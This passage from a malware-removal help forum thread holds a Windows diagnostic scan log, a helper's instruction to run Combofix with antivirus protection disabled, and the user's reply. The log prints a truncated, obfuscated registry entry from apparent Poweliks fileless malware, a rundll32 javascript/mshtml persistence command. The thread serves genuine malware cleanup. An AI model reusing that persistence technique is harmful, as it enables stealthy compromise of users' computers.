Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
NTRU TCG Software Stack (Version: 2.1.37 - Security Innovation, Inc.) Hidden
PC-CCID (Version: 2.0.0 - Gemalto) Hidden
Preboot Manager (Version: 03.03.00.090 - Wave Systems Corp.) Hidden
Private Information Manager (Version: 07.01.00.030 - Wave Systems Corp.) Hidden
QuoteExpress Sheetmetal Workstation (HKLM-x32\...\QuoteExpress Sheetmetal Workstation) (Version:  - Quote Software)
Raptr (HKLM-x32\...\Raptr) (Version:  - )
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5907 - Realtek Semiconductor Corp.)
Sentinel Protection Installer 7.3.2 (HKLM-x32\...\{EDFE2142-CFB3-44AB-A961-DE85F6408A28}) (Version: 7.3.2 - SafeNet, Inc.)
SPBA 5.9 (Version: 5.9.4.6901 - UPEK Inc.) Hidden
Spotify (HKCU\...\Spotify) (Version: 0.9.12.10.g89b2a4fc - Spotify AB)
ToolBook 11.0 Runtime (HKLM-x32\...\{715CA5EF-E3EC-4275-9658-FCBEC080A7D1}) (Version: 11.0.0.22 - SumTotal Systems, Inc.)
ToolBook Neuron (HKLM-x32\...\{DF0038DC-A9B7-4F52-8CA4-C79A3CA631FA}) (Version: 9.0.0.0 - SumTotal Systems, Inc.)
toolkit32for64bit (x32 Version: 7.67.47.0000 - Wave Systems Corp) Hidden
TOSHIBA Call Manager (HKLM-x32\...\TOSHIBA Call Manager) (Version: 8.0.6.3 - Toshiba America Information Systems, Inc)
Toshiba TSP for Windows x64 (HKLM\...\{87C62091-B343-4F5F-A090-FDF42EF71DF2}) (Version: 8.0.12 - Toshiba America Information Systems, Inc.)
Trade Service Online Link Update Manager v1.1.16 (HKLM-x32\...\{C9099687-F025-41C0-9263-55D1CC695B61}) (Version: 1.1.16 - Trade Service, A Trimble Company)
TRA-SER SX Link Export Bridge v1.1.0 (HKLM-x32\...\{BE00941F-2156-442F-9851-61E759481FFD}) (Version: 1.1.0 - Trade Service Company LLC)
Trusted Drive Manager (Version: 4.5.0.136 - Wave Systems Corp.) Hidden
Update for Microsoft Excel 2010 (KB2837600) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4ACD847E-547D-493F-9A86-F73EAE1B5174}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2837594) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{D3C85176-ACCC-4AF0-817D-1BC803303B74}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2837594) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{D3C85176-ACCC-4AF0-817D-1BC803303B74}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{18B3CF2A-73F7-4716-B1AE-86D68726D408}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.SingleImage_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553378) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{14B7142F-D7E2-4FB0-9E3B-7CAA8D7FFC56}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{C0BDC1DE-C35E-422B-8CBD-C1D555468720}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition (HKLM-x32\...\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.SingleImage_{9865DC3A-2898-48D9-B96A-46397571C934}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2553444) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{799005D3-9B70-4219-AFE0-BC479614CC4D}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Upek Touchchip Fingerprint Reader (Version: 1.2.004 - Dell Inc.) Hidden
Wave Crypto Runtime 2.0.7.0 x86 (x32 Version: 02.00.07.0000 - Wave Systems Corp) Hidden
Wave Infrastructure Installer (Version: 07.67.60.0020 - Wave Systems Corp) Hidden
Wave Support Software Installer (Version: 05.13.00.051 - Wave Systems Corp) Hidden
Windows Driver Package - Dell Inc. PBADRV System  (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Small Business Server 2008 ClientAgent (HKLM\...\{E4FF4DF1-F99C-49AC-B398-BE0887432846}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 Desktop Links Gadget (HKLM\...\{F5E5D7CA-0F94-41A3-8106-66473C2F3728}) (Version: 6.0.5601.0 - Microsoft Corporation)
Windows Small Business Server 2008 WMI Provider (x32 Version: 6.0.5601.0 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-462157724-132793273-1689201830-1165_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

23-07-2014 07:00:00 Scheduled Checkpoint
31-07-2014 07:00:00 Scheduled Checkpoint
06-08-2014 10:00:12 Windows Update
14-08-2014 07:00:02 Scheduled Checkpoint
21-08-2014 16:35:19 Installed CCMComInterface.
21-08-2014 16:36:01 Installed Toshiba TSP for Windows x64.
27-08-2014 21:53:35 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 19:34 - 2009-06-10 14:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {9D553F00-00A2-49D2-9EF7-91B0DB6371A8} - System32\Tasks\TSOLnkUpdAlertTask => C:\Program Files (x86)\Trade Service\Trade Service Online Link Update Manager\TSOLnkUpdAlert.exe [2013-10-08] (Trade Service, A Trimble Company)
Task: {BDB1D743-5BC8-44A4-9373-8F8DE671AB54} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: C:\Windows\Tasks\TSOLnkUpdAlertTask.job => C:\Program Files (x86)\Trade Service\Trade Service Online Link Update Manager\TSOLnkUpdAlert.exe

==================== Loaded Modules (whitelisted) =============

2012-01-17 06:45 - 2012-01-17 06:45 - 00218504 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe
2012-01-17 06:45 - 2012-01-17 06:45 - 00038792 _____ () C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\DeviceStatus.dll
2011-10-08 21:56 - 2011-10-08 21:56 - 00003072 _____ () C:\Program Files (x86)\NTRU Cryptosystems\NTRU TCG Software Stack\bin\TspPopup_ENU.dll
2011-11-07 06:55 - 2011-11-07 06:55 - 00094720 _____ () C:\Windows\system32\Wavx_ESC_Logging.dll
2006-12-08 14:42 - 2013-02-11 20:23 - 00155136 _____ () C:\Windows\system32\BioAPI100.dll
2006-12-08 14:41 - 2013-02-11 20:23 - 00239104 _____ () C:\Windows\system32\BIOAPI_MDS300.dll
2014-03-14 03:21 - 2014-03-14 03:21 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\fe037daff2a38d4444d6179a4cada248\IsdiInterop.ni.dll
2013-02-11 20:17 - 2012-05-30 12:55 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2013-02-11 20:21 - 2012-10-22 17:22 - 01199648 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll
2014-08-21 09:37 - 2014-08-21 09:37 - 00039424 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\AxInterop.PLAYRECLib\316a2eef99b6f67bd901d7f695dce92b\AxInterop.PLAYRECLib.ni.dll
2014-08-21 09:35 - 2014-01-14 16:14 - 00204800 _____ () C:\Program Files (x86)\Toshiba\CallManager\CcmConfiguration.XmlSerializers.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\atashost => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (08/28/2014 01:57:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16561, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 9.0.8112.16561, time stamp: 0x53925522
Exception code: 0xc00000fd
Fault offset: 0x00417f35
Faulting process id: 0x540c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (08/28/2014 07:15:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/28/2014 07:06:46 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 10:34:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16561, time stamp: 0x4a5bc6b7
Faulting module name: MSHTML.dll, version: 9.0.8112.16561, time stamp: 0x53925522
Exception code: 0xc0000005
Fault offset: 0x00432511
Faulting process id: 0x38c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (08/27/2014 04:26:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 04:13:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 03:09:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/27/2014 03:05:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/27/2014 03:04:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CSQuoteSoftImageConverter.exe, version: 1.0.0.0, time stamp: 0x5314dfdc
Faulting module name: KERNELBASE.dll, version: 6.1.7601.18409, time stamp: 0x5315a05a
Exception code: 0xe0434f4d
Fault offset: 0x000000000000940d
Faulting process id: 0x%9
Faulting application start time: 0xCSQuoteSoftImageConverter.exe0
Faulting application path: CSQuoteSoftImageConverter.exe1
Faulting module path: CSQuoteSoftImageConverter.exe2
Report Id: CSQuoteSoftImageConverter.exe3

Error: (08/27/2014 02:51:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

System errors:
=============
Error: (08/28/2014 07:11:28 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Windows Update service hung on starting.

Error: (08/28/2014 07:07:36 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {0002DF01-0000-0000-C000-000000000046}

Error: (08/28/2014 07:06:35 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/28/2014 07:05:07 AM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.37 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (08/28/2014 07:05:05 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:03:10 AM on ‎8/‎28/‎2014 was unexpected.

Error: (08/27/2014 04:25:48 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/27/2014 04:24:40 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The NTRU TSS v1.2.1.37 TCS service depends on the TPM Base Services service which failed to start because of the following error:
%%0

Error: (08/27/2014 04:23:50 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (08/27/2014 04:22:06 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Error: (08/27/2014 04:22:06 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: The Computer Browser service depends on the Server service which failed to start because of the following error:
%%1068

Microsoft Office Sessions:
=========================
Error: (08/28/2014 01:57:31 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165614a5bc6b7MSHTML.dll9.0.8112.1656153925522c00000fd00417f35540c01cfc302047a7683C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlled010fdd-2ef5-11e4-b45d-90b11c94c645

Error: (08/28/2014 07:15:13 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/28/2014 07:06:46 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 10:34:01 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe9.0.8112.165614a5bc6b7MSHTML.dll9.0.8112.1656153925522c00000050043251138c01cfc27fb5116705C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dlle9c1e280-2e74-11e4-b6d5-90b11c94c645

Error: (08/27/2014 04:26:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 04:13:11 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/27/2014 03:09:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/27/2014 03:05:12 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/27/2014 03:04:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: CSQuoteSoftImageConverter.exe1.0.0.05314dfdcKERNELBASE.dll6.1.7601.184095315a05ae0434f4d000000000000940d

Error: (08/27/2014 02:51:34 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

==================== Memory info ===========================

Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 21%
Total physical RAM: 8146.39 MB
Available physical RAM: 6370.52 MB
Total Pagefile: 16290.97 MB
Available Pagefile: 13635.48 MB
Total Virtual: 8192 MB
Available Virtual: 8191.79 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:464.98 GB) (Free:389.97 GB) NTFS
Drive g: (Data) (Network) (Total:840 GB) (Free:370.73 GB) NTFS
Drive p: (Data) (Network) (Total:840 GB) (Free:370.73 GB) NTFS
Drive q: () (Network) (Total:99.9 GB) (Free:28.3 GB) NTFS
Drive x: () (Network) (Total:99.9 GB) (Free:28.3 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: E4103F4C)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=752 MB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=465 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:23 AM

Posted 28 August 2014 - 04:26 PM

Ok.


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 LynnBR

LynnBR
  • Topic Starter

  • Members
  • 104 posts
  • OFFLINE
  •  
  • Gender:Female
  • Local time:01:23 AM

Posted 28 August 2014 - 04:33 PM

Aharonov, I forgot to mention that I have run scans with Malware Bytes which came up clean, and have ESET running as you can see in report. I have seen ESET popups about blocked websites, which is what steered me here even though scans came back clean. Saw that I am not alone in this problem.



#6 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:23 AM

